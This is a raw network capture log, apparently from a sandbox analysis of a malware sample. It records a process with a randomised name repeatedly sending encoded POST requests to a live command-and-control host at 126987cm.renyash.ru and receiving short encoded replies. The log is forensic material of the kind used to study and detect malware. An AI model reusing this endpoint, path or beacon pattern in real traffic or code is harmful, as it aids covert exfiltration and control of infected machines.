                                                                                                                                Jan 1, 2025 21:48:53.496126890 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J3vqBbunO52YI67jfI93jUUFa6cPx1klvC0hFjRHCQum4xGlUzF%2F0u9efq35o2Rr8MDID7lfNT10JUq1GlmzkNQxUM25kUy0DbJDoSsGodDBbWVKgNEdT3kw0mf%2FO8O8EmvY3iz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f6c6beec325-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1653&rtt_var=5385&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=70487&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                118 | 192.168.2.4 | 50125 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:53.626204014 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:53.986680031 CET | 1072 | OUT | Data Raw: 51 51 5e 50 53 43 59 51 5d 56 5b 57 54 54 51 5e 58 57 58 59 5b 55 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ^PSCYQ]V[WTTQ^XWXY[UWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!['!3_#!.!=?^3>,! (4#6<T' :X)@)+72!^&%X*
                                                                                                                                Jan 1, 2025 21:48:54.101146936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:54.308953047 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYST3Dp6TmHC6NSoLhJP6Jsa3BDk0oC3mnJRMZ8ywi1Exs%2B4hhkt%2BuFL4t%2BcvAXnH4H89OsgVYkn5UvgLftpMPorF0M3br69L0XBdnvpGar9on10q4fTHbx7mYpVTNroEQ7c6jgI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f71cae90f45-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3248&min_rtt=1664&rtt_var=3793&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=101806&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                119 | 192.168.2.4 | 50126 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:54.439826965 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                120 | 192.168.2.4 | 50127 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:54.473850965 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:54.829555988 CET | 1788 | OUT | Data Raw: 54 54 5b 53 53 40 5c 55 5d 56 5b 57 54 5b 51 53 58 53 58 5f 5b 52 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[SS@\U]V[WT[QSXSX_[RWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_'349\!<3[4Y5/T+'P6$W0*))+.82*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:54.925796032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.175950050 CET | 962 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=grCrfVQj48yzI4BT2kXnbIHS2aZT%2BfLuINx9z6fZ67yGukaV7gCtOg3iFQcdh%2BDJVVx3j2t%2FM7EfQ%2BiJZQ1Kd5uoECNvi%2BaP6Qi%2FD1jceYUPKGYL7dH%2F3xwofsMBy4YRnksoBRm1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f76fd60f795-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2985&min_rtt=1661&rtt_var=3271&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=119135&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 1f 28 26 24 0c 23 54 21 55 3e 06 37 1c 24 22 32 11 26 20 2d 0a 2a 2b 3c 01 3f 3f 2c 52 31 3c 30 5f 33 29 29 1b 3c 54 30 5d 3e 0c 20 5c 05 1b 3a 06 30 39 30 01 26 2b 3a 0c 3e 09 2f 01 23 3f 08 58 2a 0a 20 57 20 06 36 05 25 01 21 53 33 29 2d 0a 2b 05 30 01 3e 30 01 54 32 07 2a 51 0f 16 3b 0b 3d 09 26 10 29 2c 24 1c 24 0f 37 03 36 36 39 13 25 38 20 0c 33 2a 22 10 3f 00 24 0e 23 20 20 0c 31 3c 2a 12 32 00 24 0d 2c 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!(&$#T!U>7$"2& -*+<??,R1<0_3))<T0]> \:090&+:>/#?X* W 6%!S3)-+0>0T2*Q;=&),$$7669%8 3*"?$# 1<*2$,*&^ "S?UV0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                121 | 192.168.2.4 | 50128 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:54.595823050 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:54.952347040 CET | 1072 | OUT | Data Raw: 51 55 5b 5f 56 40 59 5e 5d 56 5b 57 54 5d 51 58 58 56 58 59 5b 54 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[_V@Y^]V[WT]QXXVXY[TWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'13X#!-!4'.+#+T(<" R'#-)1A+#1!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:55.048865080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.224039078 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVwcMlmc2KgAOq574fD6Khyd8p%2F1Bt3K%2B2dNvzEA2vHIQ91OsCQsOmU97DINxrcclSIi9PwGtGZM7JkLU8ARhVuLIuJqqewzVheXMmwgETv1JMQme0so4nK29T3qDkrCpiErvwEA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f77bc4242a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3488&min_rtt=1731&rtt_var=4164&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=92446&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                122 | 192.168.2.4 | 50129 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:55.343507051 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:55.702524900 CET | 1072 | OUT | Data Raw: 51 53 5b 56 56 47 59 54 5d 56 5b 57 54 59 51 5c 58 5c 58 5e 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS[VVGYT]V[WTYQ\X\X^[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&2^#> >#^$5V+4Q",0#:)&!E?<[%!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:55.788171053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.965631962 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXHorMTy9Un%2FIf80vX3wP6DmjAkHIs6agCI17lpEiWTynywz1yiCOraSxKEyMC2FFzMnIECO2bboEYnFSUVBSste%2FQvqzn0Xhmxi1hL6sSSDmRRHwsbyuwDjDh8Sh5%2FPr5wrQxHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f7c6f26f797-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2364&min_rtt=1570&rtt_var=2176&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=184296&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                123 | 192.168.2.4 | 50130 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:56.091758966 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:56.437292099 CET | 1072 | OUT | Data Raw: 54 52 5e 53 53 44 5c 53 5d 56 5b 57 54 5a 51 52 58 54 58 5a 5b 54 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^SSD\S]V[WTZQRXTXZ[TWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'!#[7-Y!;_$>'"+#+7'5/$&[>)C<'':!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:56.713004112 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:56.978677988 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEvlZlcYg89%2FqCRPBpBL91EERz3Bc55oxhIS2nWj7GbPMZBVGEtBVHSdebo1Zrk%2F8Z0HI0XEVFI3KA4owtxRLD5i1SvBpJlNb2JsPduNO66DwK5UjumGV00wjWlqCut0KDDn6j%2Fw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f81db6ac34d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=47158&min_rtt=38834&rtt_var=31211&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=13848&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:57.098083973 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                124 | 192.168.2.4 | 50131 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:57.254924059 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:57.614315033 CET | 1072 | OUT | Data Raw: 54 57 5b 56 56 4a 59 50 5d 56 5b 57 54 59 51 5e 58 55 58 50 5b 55 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[VVJYP]V[WTYQ^XUXP[UWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$!# "" 0-5]4?'<#&(R3!*59<?':!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:57.702872038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:58.020695925 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSmk3TIdD6cQ9Wqy8TnZd9yVF9SF%2BHVlZZxpea9z2BeeGfjCgkZ9oYaDgOBERrihpesCCmRJsglaKTu%2FeEh7SaR1ggpnNYy5oPJLmilrpu2WRXNwQLT4KlWqGHEiFZRLcYKp8x1z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f8858828c75-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2346&min_rtt=1818&rtt_var=1738&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=241481&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.4 | 50132 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:58.141271114 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:58.499340057 CET | 1072 | OUT | Data Raw: 54 57 5b 55 56 4b 5c 56 5d 56 5b 57 54 5d 51 52 58 57 58 5e 5b 50 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[UVK\V]V[WT]QRXWX^[PWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X32X4-!><3,[#('U(U"4R30Z*:<0[2!^&%X*#
Jan 1, 2025 21:48:58.610589981 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:58.786775112 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQB%2BnzZV9lkIc9Op0OtGXLiNwR%2BryoOsKQGJuKp3MQMBkAQrgVk3cX%2BE4hiZFrnYvxWDtGNH538iUKHM1AensxSHNLW2Axb8aZa0ebkkNTDtMP5rbBF0RCCA2wX3LYAwdTeXRyWL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f8e0f4441b2-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4008&min_rtt=2122&rtt_var=4568&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=84814&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.4 | 50133 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:58.950297117 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:59.296674967 CET | 1072 | OUT | Data Raw: 54 52 5b 52 56 4b 5c 54 5d 56 5b 57 54 5a 51 53 58 51 58 59 5b 51 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[RVK\T]V[WTZQSXQXY[QWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y$!'X Y"=+$=Y!R+B;P6%+':\)5"(#'*!^&%X*?
Jan 1, 2025 21:48:59.394798994 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:59.587954998 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yq%2B5uZkxCqRmJhKdwWOV%2F7jtmCjRlAwhfihCWu%2B3t%2F9ejEbmPpENeDJ2itcvBDzfZhmquj8WIJLzNiqeTQDOdM2%2F0QY8CueLiLnNqUw99E6qY85yFJAwqKnBlel3tDX7YtfKWxS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
